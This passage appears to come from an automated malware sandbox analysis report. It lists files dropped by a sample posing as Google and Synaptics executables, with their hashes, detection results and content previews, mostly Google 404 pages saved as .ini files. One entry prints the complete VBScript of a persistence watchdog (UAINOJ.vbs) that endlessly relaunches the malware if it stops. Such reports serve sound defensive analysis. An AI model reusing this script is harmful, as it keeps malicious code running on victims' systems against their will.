                                                                                                                                                                          SHA-256:33799D7E99D372A6813B70A051942A9DE012DD25555C880BAE6BC5EAD30C45CB
                                                                                                                                                                          SHA-512:BD183F16CD90492DEF66A968590B185040B4CDBA4A9FE306C7ACA315972BB6226B64EFB6DFBAF2DED066D67D59037DD0503E781765C2C3C8BCE62F6467784385
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Kr7muq2wZTqj94zTB9jHzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\UAINOJ.vbs

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):849
                                                                                                                                                                          Entropy (8bit):5.3473833786387965
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:dF/UFKDU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFKIt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                                          MD5:085EF8614C95EF30B9B55E400CC4F0D0
                                                                                                                                                                          SHA1:5B0A126071994ADFA289A23DDA3B9FB86A61387C
                                                                                                                                                                          SHA-256:5E1254C81B5B8ED63341FA92A1A8983B2294439655A410613FEE9C36A5BFC49B
                                                                                                                                                                          SHA-512:45AC0DF992ADDCA8D090E9975DB1A920C2355C9315D3A8DB879DA801EC5AD39AAF8B076DF46801BD6E6697D0996DF203EBA33604907EBA4F2C24DD27B428A29E
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_Google.exe"..fileset = """C:\Users\user\AppData\Local\Temp\._cache_Google.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\YDcMLELS.xlsm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\bf2VsTb.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.264423168834771
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+00fFNzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+rNz+pAZewRDK4mW
                                                                                                                                                                          MD5:E24E9E62121A03FC0D2EB7FF748D31FA
                                                                                                                                                                          SHA1:DC3E62F3E61F9EA5BA4582CB2B88CDEB71799A07
                                                                                                                                                                          SHA-256:DB7742250FAB404A38B279F66D439B4FF518B3445451EC6D80A25C80520B9E97
                                                                                                                                                                          SHA-512:723F0DF8B7E0441AD1862F0A330A338317790E9FFFBA11BE4B3DA74D57671B00FA0DBB8EE66C1584F2FFA746B0F00D1F771C2E9B12BBCB719C3AD204C52C3B97
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OMYfzZxgA4XbBb_OpgWvaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\caqxErN.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260462124832062
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0bOqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+eOqI+pAZewRDK4mW
                                                                                                                                                                          MD5:6FB0A678670C6F3F1E2486DFFF3EE379
                                                                                                                                                                          SHA1:928E39BDFCE1FDC310D18B8740D6ADE934B0BFEB
                                                                                                                                                                          SHA-256:374A7BB5AF83EC91434A0969BAD3A9831D368EBF28F127B03760CC0F5972B203
                                                                                                                                                                          SHA-512:92668AC5EBC2ECEA4347C36FC48107F5D2472BF9AF31E0CAFA95759A04F69A8ACDADDBB8FD0A7978508D0FC1AC4D9B52B35398D774A73462A3FAB49B4BC27C56
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KlwvB4Xz1_9vYsCyNidPtw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\gyZ72h5.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259176696565207
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0uESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+q+pAZewRDK4mW
                                                                                                                                                                          MD5:6617BEF7E7EE97846627D066F0A4827B
                                                                                                                                                                          SHA1:DD6F7D10705D024B25996BBD7514452406D9AE6E
                                                                                                                                                                          SHA-256:925F9F190124485FF47A31B089FBF3CE8513CEE2729403F7496091C60210867C
                                                                                                                                                                          SHA-512:C5CC995C22FFB4D9A1FFCC53A774153030EFA50E4D0B4B701B6670F4EBDA12E489942542FF6BF5FE64EBCFC1600806DECEB72584EB83EBE79301FD82D5C56C0E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XrbaJl7_qMNVRTApqixv7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\hUPltxU.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.254975106081996
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0H3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                                                                          MD5:B4727F8E59818E3348C7A7CC60560CB4
                                                                                                                                                                          SHA1:C72E3126D69183043A087E1091E0E99510B1B852
                                                                                                                                                                          SHA-256:451954AEC7571D339CD86D4DB6357D8AF67673CFA3A751AAA42B68312BEAB650
                                                                                                                                                                          SHA-512:BE321A76053312C8933A621CB1DFAB43115889BEA6C9B84AAD170AE9C623CE10A01C811B76EB349F54CA92C2537FF7021510731A5E6E3D80A25253B6840579F5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OhgqDFqQ8DytipOy1mGchg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\jiZownQ.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.272456923908169
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                                                          MD5:A2583AFB1972B002731602FA8E7006D0
                                                                                                                                                                          SHA1:374028A3C8AD973D3AFCADC6436D589B97E6F4DA
                                                                                                                                                                          SHA-256:F21C766043900696B2749DF5545B8147FB26E19333340A6004A6323D1314B2F1
                                                                                                                                                                          SHA-512:7B582152E3F1E61054A37930BD84AB99BAD2DF4A98FEEB2F448D85E87ED3077C2DD6D18F586880E2DF5829C2F9F3E4BA47691C73BA915BB15270445B99045188
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NBvE8IeBxFUNlNiVfFDAUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\lhKjumh.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.269489567773702
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0TIlzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+os+pAZewRDK4mW
                                                                                                                                                                          MD5:A0D787612C25222970F13DDC7EA82BA4
                                                                                                                                                                          SHA1:0F68D50D98F1B1A081AB377688BE93B4A40D38BD
                                                                                                                                                                          SHA-256:283AC14BE8F3EF053BD5018050DE311FA662F3B575209C474BB3BBF3684272EB
                                                                                                                                                                          SHA-512:6E51AC5F79BC60DD8A7643FD463B13882DA8507DED3C3F280FFBE9E035D575EF21CD3B4F707AD89E15FAA942BAA2464108A065AA4820C6DDB42D44757DCBE069
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="39qaTZs4tVzCNUDlsIJfmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ltJmu2e.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.265550037150324
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+07WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                                          MD5:8B1B672BF8DFCD45B1AF8EA6EC0C7728
                                                                                                                                                                          SHA1:03B02BF217C905C0A11B015B06908110FB78AFCC
                                                                                                                                                                          SHA-256:F4EADD9EFE7FC76425A6838A672366E4BD1010E719C0F6301C28076F4BEEE752
                                                                                                                                                                          SHA-512:DC8F75B33CD2EDE4C312EFD36950AABF2A54F2192AB4AE303754848A1878D2ABFDED5510D3FE555EC861B77E8143DE27AB2E9668F9FE35F27F512B5006502FFF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="t6qKo7J7vyfB3HG2cI0htQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oHO8bKV.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.246295592763714
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0LzbDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0r+pAZewRDK4mW
                                                                                                                                                                          MD5:36EE7B6AE1AAB392891CD54EFFF8A2C5
                                                                                                                                                                          SHA1:8CFA51B60C52D3047DEA97D1C00017152874276C
                                                                                                                                                                          SHA-256:8D4839CBC4746078EF4453A0CCA12778907FB1D9CF9EFE61E27770BC4EE76601
                                                                                                                                                                          SHA-512:2384F59CF5E37250B551ECFFB0253398F15FFE1FD8EC9084931FBE36E88F6783C27145BB24BCF3DA57C228F170F3D58F470E1A6BFE120020521157465AC79C17
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2Osoipvh-Gu_zntb3a3vLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oXlcSdC.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2681766732010695
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0aKtSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+At+pAZewRDK4mW
                                                                                                                                                                          MD5:F9C9EE92417D4C82ECE07474B944B6C5
                                                                                                                                                                          SHA1:F9CB40157E79948DC68BC50B9310807D677F3218
                                                                                                                                                                          SHA-256:946B84341B0E00A8B3139F74BA239AFC526C7C2D2EDC4D629F57A941D9AFF183
                                                                                                                                                                          SHA-512:92C637AD5347773819E720480A90663622DA2C873A7DF94733E1D40584E5E79F18AAEA50BB448E1FA08678D4AABB99B4D9F08C2B90D8BD55E1E86E2CD0D99667
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K0wnGZUds0bvjzQLD8tXEA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\t7jZksw.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.270481335261545
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                                                                          MD5:803129F3EE692ED70F5DCE4FBF12002D
                                                                                                                                                                          SHA1:5429F2994FBD315BCAE1259CB241BD899310F374
                                                                                                                                                                          SHA-256:B53CC56BBB1C09C68BD44AC878C0FA3338D17C40BC8B5CD1BD759B02393DDB14
                                                                                                                                                                          SHA-512:639D7A87F9DA5C6DD0C438783288B29D40B7C8DA17FC4C8980A8D4B1DCDFBD48E3B05DEB995250C176540C39E1888346942A0FD309B85C7E24C3AA469A16E018
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ukQ26q_YaHJGbTFgAXFuPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tF7CsPl.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.251525330554386
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0HfSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                                                          MD5:A3FD9DB5E429E3FE3687CD04D19F681C
                                                                                                                                                                          SHA1:DF108786DFD2042253227C2B887001DD511C3CBA
                                                                                                                                                                          SHA-256:99E57F4AC889480561F09E725A12E75FBBAEDF9A90B3FB12094DCDE3B22849E7
                                                                                                                                                                          SHA-512:C0D49A83A5A527FDDFFB6930A190D514F02C1AC42C76EBB8F5ADCD8BFBF8D061909EBB2236175A5C2A17398BBA695EC0B889C685A2F213AA93C428E6EA7B36B2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="M51TBTqvgvKlzlctfehFqg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tJPEyz5.ini

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.262777937111682
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0Qw3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+RE+pAZewRDK4mW
                                                                                                                                                                          MD5:9FB264629952A0D5B4B9F9D111BE5457
                                                                                                                                                                          SHA1:08A0D88DD1AC6F11444CE6087088968558A5E08C
                                                                                                                                                                          SHA-256:D646A2A3003EC2B775F49064CBED8BA2CEDE5DCB1E67D20427F4CCB9FC8F6490
